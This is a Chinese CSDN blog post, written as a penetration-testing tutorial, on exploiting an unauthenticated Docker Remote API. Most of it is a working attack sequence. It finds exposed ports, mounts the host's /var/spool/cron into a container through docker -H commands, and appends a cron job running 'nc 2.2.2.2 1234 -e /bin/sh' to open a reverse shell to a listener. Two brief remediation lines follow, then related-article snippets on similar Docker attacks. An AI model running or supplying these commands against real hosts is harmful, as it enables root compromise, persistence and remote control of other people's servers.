Docker未授权访问漏洞利用

最新推荐文章于 2024-07-07 18:00:00 发布
最新推荐文章于 2024-07-07 18:00:00 发布
阅读量2k 收藏 2
点赞数
文章标签: docker java linux centos shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tangshuangsss/article/details/122389330
版权

a4afc64080b3044c0b13d65a725fcd5b.gif

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维3067d84a5446d9350b501541677a9f9f.png

让我们每天进步一点点

简介

Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。

Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。Docker Remote API如配置不当可导致未授权访问,攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,并且可以执行Docker命令。

实战

1.使用nmao或者fofa来发现端口或者服务。

4ee45c81d2a882fc1619408942dfad99.png

2.web方法查看是否存在漏洞,直接在浏览器中输入1.1.1.1:6066/version访问即可,web方法比较局限大部分只能获取敏感信息。

760c2f9c9d6df1cf7f1809727be71069.png

3.使用docker客户端连接执行命令反弹shell

#攻击机上开启nc监听反弹shellnc -vv -l -p 1234
# 查看宿主机可用镜像docker -H tcp://1.1.1.1:6066 image

# 选择合适镜像创建容器,并将宿主磁盘挂载到容器中(注意标红参数是镜像id)
docker -H tcp://1.1.1.1:6066 run -it -v /var/spool/cron/:/var/spool/cron/ image_id /bin/bash# 查看运行容器信息docker -H tcp://1.1.1.1:6066 ps# 启动刚刚创建的容器并连接(注意标红参数是容器id)
docker -H tcp://1.1.1.1:6066 start ct_id
docker -H tcp://1.1.1.1:6066 exec -it --user root ct_id /bin/bash

# 执行shell反弹命令(2.2.2.2是nc反弹ip,定时任务路径也要根据系统来)
root@0d99a9b2e66b:/#sh -c "echo '* * * * * /usr/bin/nc 2.2.2.2 1234 -e /bin/sh'">> /var/spool/cron/root

3ea566cca6e9838d1840fad1a90c0500.png

4.修复方法:

配置白名单不要将端口开放到外网

配置鉴权开启tls

往期内容

Redis未授权漏洞利用

工具篇-BurpSutie Pro 2021.10.1最新版本

2021湖北省工匠杯预赛WriteUP

aaed76b9cfc7918bdd88bab37aa1d41e.gif

cdcb2b3d7053bdf348eefad7940a7f2c.gif

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗04a9691c1a7094443842e3a09a194e91.png      

TaibaiXX1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Docker授权访问漏洞
qq_48257021的博客
03-26 853
1)Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署,包括VMs(虚拟机)、bare metal、OpenStack 集群和其他的基础应用平台。可以将Docker理解为一个集装箱,集装箱解决了什么问题?在一艘大船上,可以把货物规整的摆放起来,并且各种各样的货物被集装箱标准化了,集装箱和集装箱之间不会互相影响。
验证docker的Redis镜像也存在授权访问漏洞
JoeZ_blog的博客
12-04 1641
看到了这篇老外的博客:Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities 于是,结合最近爆出的redis授权访问导致可远程获得服务器权限漏洞,在docker容器中验证官方pull的镜像是否存在漏洞。        我的docker安装在centos7的虚拟机中,版本1
手把手教你搭建 Docker API 授权漏洞环境
最新发布
nhb687096的博客
07-07 1043
环境:ubuntu 16.04我是在虚拟机中安装了ubuntu 16.04的环境,里面暂时没有docker、ssh远程、vim等。
docker授权rce+docker逃逸复现
weixin_54227009的博客
05-22 1362
这段时间跟着bnessy师傅一起打内网,跟着bnessy师傅也学到了很多有用的姿势,这里就来复现几个内网的漏洞(大佬轻喷)
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1704
docker api授权导致rce 漏洞修复
Docker 授权访问漏洞
Thunderclap的博客
07-13 2070
Docker 授权访问漏洞
云安全漏洞发现和利用.pdf
05-10
2.5 存储桶文件中的信息泄露:公开的存储桶允许授权访问,可能导致业务代码、个人数据等敏感信息泄露。 2.6 命令执行后发现敏感信息:在容器环境中,执行特定命令可能暴露出内部环境信息、认证凭证或其他敏感数据...
vulhub漏洞测试靶场
08-16
Vulhub涵盖了多种类型的漏洞,如SQL注入、XSS跨站脚本、命令注入、文件包含、授权访问、缓冲区溢出、CSRF跨站请求伪造等。通过实践这些场景,用户可以深入了解每种漏洞的工作原理、攻击方式以及相应的防御策略。 ...
Docker容器安全性解决方案.pdf
10-11
例如,可以使用 Docker 的安全机制来限制容器的访问权限,防止授权访问等安全问题。 容器网络安全是指在容器之间或容器与外部网络之间的网络连接中,为了确保数据的安全传输,采取的一些安全机制和解决方案。...
增强Linux内核中访问控制安全的方法
09-15
Linux环境中,有多种方法可以增强内核的安全性,防止授权访问和攻击。本文将详细探讨几种常见的技术,包括动态库劫持、系统调用劫持以及Linux Security Modules (LSM)。 首先,动态库劫持是一种利用`LD_...
0、漏洞说明.docx
04-21
15. Docker Daemon API授权访问漏洞:允许攻击者无需认证即可通过Docker守护进程API执行命令,对容器环境造成严重破坏。 16. Drupal系列漏洞:包括SQL注入、反序列化任意代码执行、远程代码执行等,这些漏洞极大...
授权访问漏洞之一
qq_45233918的博客
12-21 2306
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。
利用docker漏洞攻击别人服务器
youth_shouting的博客
06-30 562
前言 通过docker的远程服务向服务器的ssh写入本机公钥实现免密登录。 实现原理 docker开启了远程访问服务 服务器有ssh服务(一般都有) docker开启了远程服务之后通过docker的挂载功能将root/.ssh/目录挂载到docker容器中然后将本机公钥写authorized_keys中,即可实现ssh免密登录 实现过程 docker开启远程服务 vim /lib/system/system/docker.service # 修改ExecStart ExecStart
漏洞扫描-Docker Remote API 授权访问漏洞利用
weixin_44041994的博客
03-15 388
Docker提供了一个用于与Docker守护程序交互的API(称为 Docker 引擎 API)。Docker引擎API是一个RESTful API,可由HTTP客户端(如 wget 或 curl)或HTTP 库访问,HTTP库是大多数现代编程语言的一部分。在网址栏输入 目标主机IP:2375/containers/json可获取该主机的Docker容器信息。使用docker命令创建一个alpine容器,并将目标主机的磁盘挂载到容器中。Docker是一种执行操作系统级虚拟化的计算机程序,也称为"容器化"。
Docker Remote API 授权访问导致挖矿病毒入侵
SecGuard
06-09 2631
运维同事反映一台阿里云测试机,反映很慢,除了跑一些docker容器,没有其他服务。 ps -ef查看当前进程,发现存在多个cryptonight密货币的挖矿进程,分别为proc, thisxxs, xmrig: 对这些进程的所在路径进行排查,使用lsof工具查看它们打开的文件:进程所使用的文件都已经找不到,初步判断是被删除。 换个思路(中间尝试过各种假设)扫描该服务器,发现开放...
云安全笔记-Docker daemon api 授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1475
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值